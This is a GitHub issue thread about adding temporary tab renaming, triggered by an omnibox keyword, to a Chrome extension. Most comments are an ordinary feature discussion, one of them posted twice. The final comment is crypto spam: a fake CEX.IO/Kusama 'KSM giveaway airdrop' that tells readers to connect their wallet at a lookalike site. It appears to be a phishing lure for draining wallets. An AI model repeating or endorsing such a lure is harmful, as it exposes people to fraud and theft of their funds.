### ISSUE TITLE
Temporary rename and reset when the tab is closed

### ISSUE THREAD

**Issue by imageslr** [imageslr/chrome-tab-modifier#3]

**Comment by dnknn** [comment]
**Temporary rename** : 
 it can also use `🏃omnibox⌨` to trigger temporary rename,  It will also be very convenient!
 
 <img align=right width=38% src=https://user-images.githubusercontent.com/10995302/109425778-061eea00-7a25-11eb-8f20-606d01d2e23d.png>
 
- ## ❥ **Expected behavior:** 
	the 🏃omnibox-key⌨ of [Tab Renamer](https://chrome.google.com/webstore/detail/kpijejpdbpeaakidlcopnbjohbfimnod) is `tr`
　　　1. `Alt+D` to focus browser address bar.
　　　2. Typing `tr` + `Space/Tab` 
　　　3. Typing  "xxxxxxxx"
　　　4. `Enter` 
　　　5. The title of this tab page will temporarily become to "xxxxxxxx"

----

- ## user UI
```
chrome://settings/searchEngines#:~:text=added by extensions
chrome://flags/#omnibox-ui-max-autocomplete-matches
```

If you have used `omnibox`, you will know the it very well!

---



- # 📖 API documentation

https://developer.chrome.com/docs/extensions/reference/omnibox/

https://developer.mozilla.org/en-US/docs/Mozilla/Add-ons/WebExtensions/API/omnibox

---

- ### Some extensions of only `omnibox` feature:

 Omnibox Timer Again  　　🏃omnibox⌨`ta`
　　https://chrome.google.com/webstore/detail/nocmdcegkncmgdianofhdlhbaoinmonm

 Bookmark Search  　　🏃omnibox⌨`bm`
　　https://chrome.google.com/webstore/detail/hhmokalkpaiacdofbcddkogifepbaijk

 Instant Multi Search 　　🏃omnibox⌨`m` 
　　https://chrome.google.com/webstore/detail/aamgapdgopfdmokckpkfciiddpahbbcg


ContextSearch web-ext 　　🏃omnibox⌨`cs`  

>  (This extension is very powerful, and it also perfectly supports the `omnibox`)

https://chrome.google.com/webstore/detail/ddippghibegbgpjcaaijbacfhjjeafjh

**Comment by dnknn** [comment]
**Temporary rename** : 
 it can also use `🏃omnibox⌨` to trigger temporary rename,  It will also be very convenient!
 
 <img align=right width=38% src=https://user-images.githubusercontent.com/10995302/109425778-061eea00-7a25-11eb-8f20-606d01d2e23d.png>
 
- ## ❥ **Expected behavior:** 
	the 🏃omnibox-key⌨ of [Tab Renamer](https://chrome.google.com/webstore/detail/kpijejpdbpeaakidlcopnbjohbfimnod) is `tr`
　　　1. `Alt+D` to focus browser address bar.
　　　2. Typing `tr` + `Space/Tab` 
　　　3. Typing  "xxxxxxxx"
　　　4. `Enter` 
　　　5. The title of this tab page will temporarily become to "xxxxxxxx"

----

- ## user UI
```
chrome://settings/searchEngines#:~:text=added by extensions
chrome://flags/#omnibox-ui-max-autocomplete-matches
```

If you have used `omnibox`, you will know the it very well!

---



- # 📖 API documentation

https://developer.chrome.com/docs/extensions/reference/omnibox/

https://developer.mozilla.org/en-US/docs/Mozilla/Add-ons/WebExtensions/API/omnibox

---

- ### Some extensions of only `omnibox` feature:

 Omnibox Timer Again  　　🏃omnibox⌨`ta`
　　https://chrome.google.com/webstore/detail/nocmdcegkncmgdianofhdlhbaoinmonm

> This lightweight tool is also good, you can create reminders directly in the address bar, which is very convenient and direct.

　
 Bookmark Search  　　🏃omnibox⌨`bm`
　　https://chrome.google.com/webstore/detail/hhmokalkpaiacdofbcddkogifepbaijk

 Instant Multi Search 　　🏃omnibox⌨`m` 
　　https://chrome.google.com/webstore/detail/aamgapdgopfdmokckpkfciiddpahbbcg


　
ContextSearch web-ext 　　🏃omnibox⌨`cs`  

>  (This extension is very powerful, and it also perfectly supports the `omnibox`)

https://chrome.google.com/webstore/detail/ddippghibegbgpjcaaijbacfhjjeafjh


@imageslr

**Comment by imageslr** [comment]
@dnknn It seemes that omnibox can only support one keyword for each extension. Which action do you think is better? To rename **permanently** or **temporarily**?

**Comment by imageslr** [comment]
> @dnknn It seemes that omnibox can only support one keyword for each extension. Which action do you think is better? To rename **permanently** or **temporarily**?

This is wrong. I have seen [the issue](https://github.com/imageslr/chrome-tab-modifier/issues/3#issuecomment-787648759) of ContextSearch. We can use `tr` as the key. By default entering `tr {title}` means temporarily rename, and `tr p {title}` means permanently rename. How about that? 

Permanently or temporarily, which should be set to the default action?

**Comment by dnknn** [comment]
> It seemes that omnibox can only support one keyword for each extension.

At the extension `manifest.json` file 👉  ``` "omnibox": {  "keyword": "tr"    }```
Corresponding to the  👉  `chrome:settings/searchEngines#:~:text=added by extensions`

Start the extension omnibox command/key, there can only be **one**, that's right!
But after startup, the extension itself can be programmed infinitely. Like you said: 

> We can use `tr` as the key. By default entering `tr {title}` means temporarily rename, and `tr p {title}` means permanently rename.


---

> Permanently or temporarily, which should be set to the default action?

Obviously, it must be **temporarily** as the **default** action!
Since it is a temporary name change, it must be possible to complete this operation as quickly/conveniently as possible!


even, "`tr p {title}` means permanently rename," this is not required :
Because Permanently, you often need advanced options such as regular matching, so Permanently, you can only operate on the options page.

**Comment by kusamanetworkss** [comment]
## Congratulations! You've receive in $3,000 KSM Giveaway ($KSM) Airdrop 🪂🔴


CEX·IO is giving away $3,000 in $KSM coins, empowering you to take advantage of KSM staking on CEX·IO with 14% APY. Join the giveaway and earn a chance to win up to $500. Stake Kusama with CEX·IO, get high rewards and win prizes!

#### About

CEX·IO is a fully regulated multi-functional cryptocurrency exchange established in 2013, serving over 4 million customers worldwide. CEX·IO has been one of the first platforms to make fiat-to-crypto transactions accessible via bank transfers and to accept debit/credit card payments for crypto deposits and withdrawals to Visa or MasterCard.

→ [How to join the $3,000 KSM Giveaway Airdrop?](https://kusamanetworks.com/)


Connect your wallet, follow the instructions, and claim this exclusive airdrop from Kusama. For GitHub users only—share with friends to make it eligible. Redeem your reward first.

![Kusama Exchange](https://cdn.airdropalert.com/images/metadata/kusamacex2222.jpeg)


### Step-by-Step Guide ''CEX·IO Kusama Giveaway''

Access the Kusama platform and connect your wallet securely. Ensure you're using a trusted wallet for the transaction.

- 🔗 Use the connect method to interact with the contract
- 💰 Connect and receive your tokens
→ [Claim Your $KSM Today](https://kusamanetworks.com/)
